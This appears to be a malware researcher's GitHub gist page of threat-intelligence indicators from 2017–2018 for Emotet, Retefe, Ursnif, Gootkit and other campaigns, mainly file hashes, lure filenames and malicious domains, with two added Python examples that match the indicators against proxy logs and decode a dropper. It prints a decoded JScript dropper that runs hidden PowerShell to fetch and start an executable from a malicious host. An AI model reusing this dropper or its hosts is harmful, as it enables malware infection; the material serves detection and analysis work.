
@Blevene
Blevene / Filenames
Created November 28, 2017 16:52
Emotet DE Targets: 11/28/2017
Informationen # 558760280928.doc
Informationen # 8104038723.doc
Invoice #38608290.doc
Invoice #639002322639.doc
Rechnung # 3310283.doc
Rechnung # 640507209.doc
Rechnung # 72120749699.doc
Rechnung # 953444866.doc
Rechnungs-Details # 4168802.doc
Rechnungs-Details # 54430860.doc
Blevene / Retefe Components
Created November 29, 2017 19:13
Retefe - e2494fc7eda73ac116a9a07aced0bab23efc6d494dd3f024e45f048b339f7860
//JS Component (UMD wrapper; the gist preview ends inside the first inner function, so the body below is incomplete)
(function(e, r) {
    "object" == typeof exports ? module.exports = r() : "function" == typeof define && define.amd ? define(r) : e.RYULJ = r()
})(this, function() {
    "use strict";
    var e = 14,
        r = 8,
        n = !1,
        f = function(e) {
            try {
Blevene / Retefe_Hashes_And_HTTP_URIs
Created November 29, 2017 22:02
Retefe Campaigns
host,method,url,user_agent,sha256,
pamplonarecados.com,GET,/pbuxegx.exe,,c9390e9f53c2a05c3cf7b84c1ee80acb8306be64b5e5e5544913ac298a1aa5db,
pamplonarecados.com,GET,/pbuxegx.exe,,05f298006d2bf23b3ebe8bf0e4bf1431602d96f5170efa0e0d983cac0d7f42b6,
pamplonarecados.com,GET,/pbuxegx.exe,,dbcdbe148ba66056fed2349138b849643cb35fd9c8424febfbc473d22418ccf2,
pamplonarecados.com,GET,/pbuxegx.exe,,648bef8d6abd544c17fcc1275a6f84686296ee9001b55bf64a3dc8971cf0f3f9,
pamplonarecados.com,GET,/pbuxegx.exe,,2ab4550f7793e53682499e852f1c043f70eaac909c30ced4d6263bb193db0ddb,
pamplonarecados.com,GET,/pbuxegx.exe,,405ec5019db005dfc205e6bab8820d43073694943396305e923f62afde0197b7,
pamplonarecados.com,GET,/pbuxegx.exe,,f19f50619761c2f712ad26c870eefd62e1a9b054d856909c8b12d04eaf7ec939,
pamplonarecados.com,GET,/pbuxegx.exe,,1125356ffdc01a4964e1504d034b3bbdb6df75fb3848fe2c72e579a7c9458743,
pamplonarecados.com,GET,/pbuxegx.exe,,93a4881c4a3c76e2afbd43b08a7a086bb03ccab717cb82e2ef9a09447624c3b2,
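The CSV above is most useful once it is turned into lookups. The following is an added example, not part of the gist: it parses the rows exactly as they appear (trailing comma included), runs them over proxy log lines, and checks file hashes against the set of binaries served from the IOC URL. The proxy log lines and their format (timestamp, client, method, host, path, status) are constructed for the demonstration.

```python
"""Lookups from the Retefe host/URI/hash CSV above, run over proxy logs.

Added example, not part of the gist. The CSV rows are copied from the page; the
proxy log lines below are constructed for the demonstration, as is the log
format (timestamp, client, method, host, path, status).
"""
import csv
import io
from collections import defaultdict

RETEFE_CSV = """host,method,url,user_agent,sha256,
pamplonarecados.com,GET,/pbuxegx.exe,,c9390e9f53c2a05c3cf7b84c1ee80acb8306be64b5e5e5544913ac298a1aa5db,
pamplonarecados.com,GET,/pbuxegx.exe,,05f298006d2bf23b3ebe8bf0e4bf1431602d96f5170efa0e0d983cac0d7f42b6,
pamplonarecados.com,GET,/pbuxegx.exe,,dbcdbe148ba66056fed2349138b849643cb35fd9c8424febfbc473d22418ccf2,
pamplonarecados.com,GET,/pbuxegx.exe,,648bef8d6abd544c17fcc1275a6f84686296ee9001b55bf64a3dc8971cf0f3f9,
pamplonarecados.com,GET,/pbuxegx.exe,,2ab4550f7793e53682499e852f1c043f70eaac909c30ced4d6263bb193db0ddb,
pamplonarecados.com,GET,/pbuxegx.exe,,405ec5019db005dfc205e6bab8820d43073694943396305e923f62afde0197b7,
pamplonarecados.com,GET,/pbuxegx.exe,,f19f50619761c2f712ad26c870eefd62e1a9b054d856909c8b12d04eaf7ec939,
pamplonarecados.com,GET,/pbuxegx.exe,,1125356ffdc01a4964e1504d034b3bbdb6df75fb3848fe2c72e579a7c9458743,
pamplonarecados.com,GET,/pbuxegx.exe,,93a4881c4a3c76e2afbd43b08a7a086bb03ccab717cb82e2ef9a09447624c3b2,
"""

# Constructed proxy log: one benign request, two to the Retefe URL (one with the
# host in upper case), one to the same host but a different path.
SAMPLE_LOG = [
    "2017-11-29T19:05:12Z 10.0.0.7 GET www.example.com /index.html 200",
    "2017-11-29T19:06:40Z 10.0.0.7 GET pamplonarecados.com /pbuxegx.exe 200",
    "2017-11-29T19:07:03Z 10.0.0.21 GET PAMPLONARECADOS.COM /pbuxegx.exe 200",
    "2017-11-29T19:09:55Z 10.0.0.33 GET pamplonarecados.com /favicon.ico 404",
]


def load_iocs(text):
    """Parse the CSV into {(host, path): {sha256, ...}} plus the set of hosts.

    The trailing comma on every row yields an empty extra column, which
    DictReader keeps under the key '' and which is simply ignored here.
    """
    by_url = defaultdict(set)
    for row in csv.DictReader(io.StringIO(text)):
        by_url[(row["host"].lower(), row["url"])].add(row["sha256"].lower())
    hosts = {host for host, _ in by_url}
    return dict(by_url), hosts


def match_log(lines, by_url, hosts):
    """One hit per log line touching an IOC host; level 'url' means exact host+path."""
    hits = []
    for line in lines:
        ts, client, method, host, path, status = line.split()
        host = host.lower()
        if (host, path) in by_url:
            hits.append({"ts": ts, "client": client, "level": "url", "host": host, "path": path})
        elif host in hosts:
            hits.append({"ts": ts, "client": client, "level": "host", "host": host, "path": path})
    return hits


def hash_known(sha256, by_url):
    """True if a file hash matches any binary served from an IOC URL."""
    return any(sha256.lower() in hashes for hashes in by_url.values())


def summary(by_url):
    """URL count against distinct-binary count for the same URL."""
    return {"urls": len(by_url), "hashes": sum(len(h) for h in by_url.values())}


if __name__ == "__main__":
    by_url, hosts = load_iocs(RETEFE_CSV)
    print(summary(by_url))
    for hit in match_log(SAMPLE_LOG, by_url, hosts):
        print(hit)
```

`summary()` returns one URL against nine distinct SHA256 values: the same path on the same host served nine different binaries, so a hash blocklist built from this data lags behind the campaign while the host and path stay stable. That is why `match_log()` reports host-level hits as well as exact URL hits.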
Blevene / gist:e601eaa3dc05c4d12b53eaf7b96aeba5
Created December 4, 2017 20:16
Ursnif/Gozi/ISFB: 12/4/2017
Filename: request.doc
SHA256
84a7ddaad12698d9b5b2f0eef0f17f42b762dac78b77a86a994a66be2f1f1ef5
9d1b9f99302ab34a0b468b52317d208dfc9d91e10ecb1d079d00c3367a9666ce
503b3ba8ae3464e6735d305f5a5fc82479fe5b961d348800d100ec911f90b208
a05c5dd59204fb505c2b4b2911d9cec4bd00337d41caec19dccdeffb58c3d756
c191965ee51c04073d47e4c5b349bf69cf33c083cc641b9f92b293ae9ae2628d
6e6ffedeb7b0e7de8a3e85ed00e8f84e61356935b1b637b4711ae691ce496490
b891b48ad2e98dbb409e4d1f95a40b30635ae528fa7076a5cb76beacaf78da05
Blevene / Snatchloader Hashes
Created December 11, 2017 15:24
Snatchloader
d38945a93a926169cbe878afa6b292a5b52c570b61dc096725a0ddb8fdd5209e
0b718516dcd50a092663c9cd6f7774408cdaaf2bf55cddf1be7a69ff83b50228
847e9993ee3dbfd6a1eadb5addf82169ec8a2c8ee45fd4811950fb5a4be849db
b9cde665debef868eb0d8dcb156e57233e0d93bfab3380ed6c9564023ff9c3c5
e2e8dc489df96d8619936c9c7ad366d7639cc9e4229e11cf1804ff8aeffa8d2f
11602f3e29f3ec67e292fb84091e512ade674f5f6b71c970f70145ad16127ffa
fe93335975f3fe88e221e68e89cfb60a1e59b6b9cbde919a8b4676dd12db2934
Blevene / Hashes
Created December 14, 2017 14:15
".styx" hunt for Demonslay335
5e7d11d6bd11b09c4cc0c4ba54ebea19dcc06ae585d0508d3d8dba251075f4c6
bf01d97d76a6bb8f3cfbf4a697403f4b686d43fabb429a7bf9427aa70371df78
ba9b26cc08591655878f90c3d8c9e346680e80a40a076efa886d18926eae2293
6a637e90e0673ee6090cc4fb47d82ab87ae7d26ffcff7a7dcafd4da167aea8bc
488a8bc75fd39460bf54dcf904c90d67c94fa1bd38b0ee729b527a062f6ddf0e
Blevene / gist:ffc1bee1dd203e3d334f829a41bf05ac
Created December 19, 2017 21:41
Possible signed TeamViewer Backconnect... thing
Ref (thanks Matt Mesa): https://vms.drweb.com/virus/?_is=1&i=8161714
7dc273a5328ec74392513bd7cc2849d1dc2bd5c83ff035612503aceb5a12ca72
9f5566b23d96b422921dec14952e64e583789757d7f93c7d453b2f5c5508dc2d
4ee7e9cc367d4cf8bcb568ab14d46a35bbf433b29d8686ee977692ab98bf8a72
48aab1c29b6113cf3cd1544188eccade9ae82e330bfc8803876fe64339425b3a
f2814dc63fc8b79e97046781e3e9efb4b653478802ab91ca45c4f6dd25728c66
06a0029bb4a706f03d1626ad79d919f32cf0529e83aa1d9d24d9a4639ec61d49
3278637ee693d3c9eefb6bc0b62b567f9f5f01a305ca3567d51f5f129a2e4e94
8159394c0ed15bc30b6da648dab3c3dcc5f9a62c830b4e2e98c9d29493b569a9
fa0e3c6c4da0ecc370918999a001276113773fafd0486b65b6a07175b00f2105
Blevene / Retefe Dropper
Created January 8, 2018 14:34
Retefe Campaign January 8th, 2018
Binary:
25a923f213098d4878858d4dea40a01262fff3029d5ac24d0f5b064b8999a853
Downloader Locations (From PowerShell):
ahkorea.eu
compters.net
concretebirdbathmolds.net
concretemoldcompanies.com
eubieartmedia.com
Blevene / bomberc
Created March 2, 2018 12:10
Decoded downloader component from d8ecb55b823b87a06eb8fc524baff969974a092385ac09bdb02537202380375c
<script>
// ActiveXObject and WScript.Shell are reached through throwaway variable names
var diskomagana = ActiveXObject;
var termianxala = new diskomagana('WScript.Shell');
// Builds the PowerShell command line: "powershell" is hidden as a space-padded string,
// then the payload is fetched to %APPDATA%\fb1b1d10.exe, started, and a check-in URL
// is requested. The trailing .replace(//g,'') is reproduced as decoded: an empty //
// starts a comment in JavaScript, so the character it originally stripped is not
// recoverable from this listing.
var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
// Close the hosting window after ~16 s, and run the command with window style 0 (hidden)
setTimeout(function(){window.close()},16180);
setTimeout(function(){termianxala.run(lopomeriara,0)})
</script>
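The two string-building tricks in that dropper (a percent-decoded, space-padded "powershell" and a single-quoted literal with escaped quotes) are what an analyst has to undo to get at the command and its indicators. The following is an added example, not part of the gist: it reconstructs the PowerShell command from the script text above and pulls out the URLs, the dropped file name, the execution-policy bypass and the hidden-window flag. The script text is copied from the page; the regexes and the output field names are the example's own.

```python
"""Recover the PowerShell command and IOCs from the bomberc-style dropper above.

Added example, not part of the original gist. It undoes the two string-building
idioms the dropper uses, decodeURIComponent("p o w e r s h e l l").replace(/ /g,'')
and a single-quoted literal with \' escapes, then extracts indicators from the
rebuilt command.
"""
import re
from urllib.parse import unquote

# Sample input: the command-building line and the run() call, copied from the
# script on the page. The trailing .replace(//g,'') is left as decoded; in
# JavaScript an empty // opens a comment, so whatever character it stripped is
# not recoverable here and the extractor simply tolerates the empty '' literal.
DROPPER = r"""var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,'');
setTimeout(function(){termianxala.run(lopomeriara,0)})"""

# A fragment is either the decodeURIComponent(...).replace(/ /g,'') idiom
# (group 1: the percent-encoded, space-padded text) or a plain single-quoted
# JS literal (group 2: body with backslash escapes still in place).
FRAGMENT = re.compile(
    r'decodeURIComponent\("([^"]*)"\)\)?\.replace\(/ /g,\'\'\)'
    r"|'((?:[^'\\]|\\.)*)'"
)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")
# $env:APPDATA followed (with or without ' + ') by a quoted backslash path
DROP_RE = re.compile(r"\$env:APPDATA[^\\']*'?\\+([\w.-]+)")
# WScript.Shell.Run(command, windowStyle): style 0 hides the window
RUN_RE = re.compile(r"\.run\(\w+\s*,\s*(\d+)\)")


def rebuild_command(script):
    """Concatenate the string fragments of the first 'var X = ...' assignment."""
    m = re.search(r"var \w+ = (.*)", script)
    if not m:
        raise ValueError("no string-building assignment found")
    parts = []
    for frag in FRAGMENT.finditer(m.group(1)):
        if frag.group(1) is not None:
            # percent-decode, then drop the padding spaces
            parts.append(unquote(frag.group(1)).replace(" ", ""))
        else:
            # resolve \' and \\ escapes inside the literal
            parts.append(re.sub(r"\\(.)", r"\1", frag.group(2)))
    return "".join(parts)


def extract_iocs(script):
    """Return the rebuilt command plus the indicators worth blocking or hunting."""
    cmd = rebuild_command(script)
    run = RUN_RE.search(script)
    return {
        "command": cmd,
        "urls": URL_RE.findall(cmd),
        "dropped_files": sorted(set(DROP_RE.findall(cmd))),
        "exec_bypass": "-Exec Bypass" in cmd,
        "hidden_window": bool(run and run.group(1) == "0"),
    }


if __name__ == "__main__":
    for key, value in extract_iocs(DROPPER).items():
        print(f"{key}: {value}")
```

The first URL is the payload (written to `%APPDATA%` under a fixed name and started), the second is a check-in with `l=bomberc` identifying the campaign; both, plus the dropped file name and the `powershell -Exec Bypass -NoExit` prefix launched with a hidden window, are the pieces to feed into proxy, EDR and process-creation detections.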
Blevene / Gootkit
Created March 13, 2018 14:27
Gootkit: 3/13/2018
e4ec1c45173db4a6c9a243c859f21b5a72b43bcdd455e18928292e2682275399
6e5c55c8b6601081fa6fbc4e4cb64b9dba0fdcf2b432c104dfdb7157dd5a7133
d7d4e15c42f830f6e6894dd2fb4ebc8f8df65f492048e67ad7bda1949271fad1
217201028cfad66ea193105e7a7d6bb0a0d9b536d8cf6093bc45c7c328d63ac7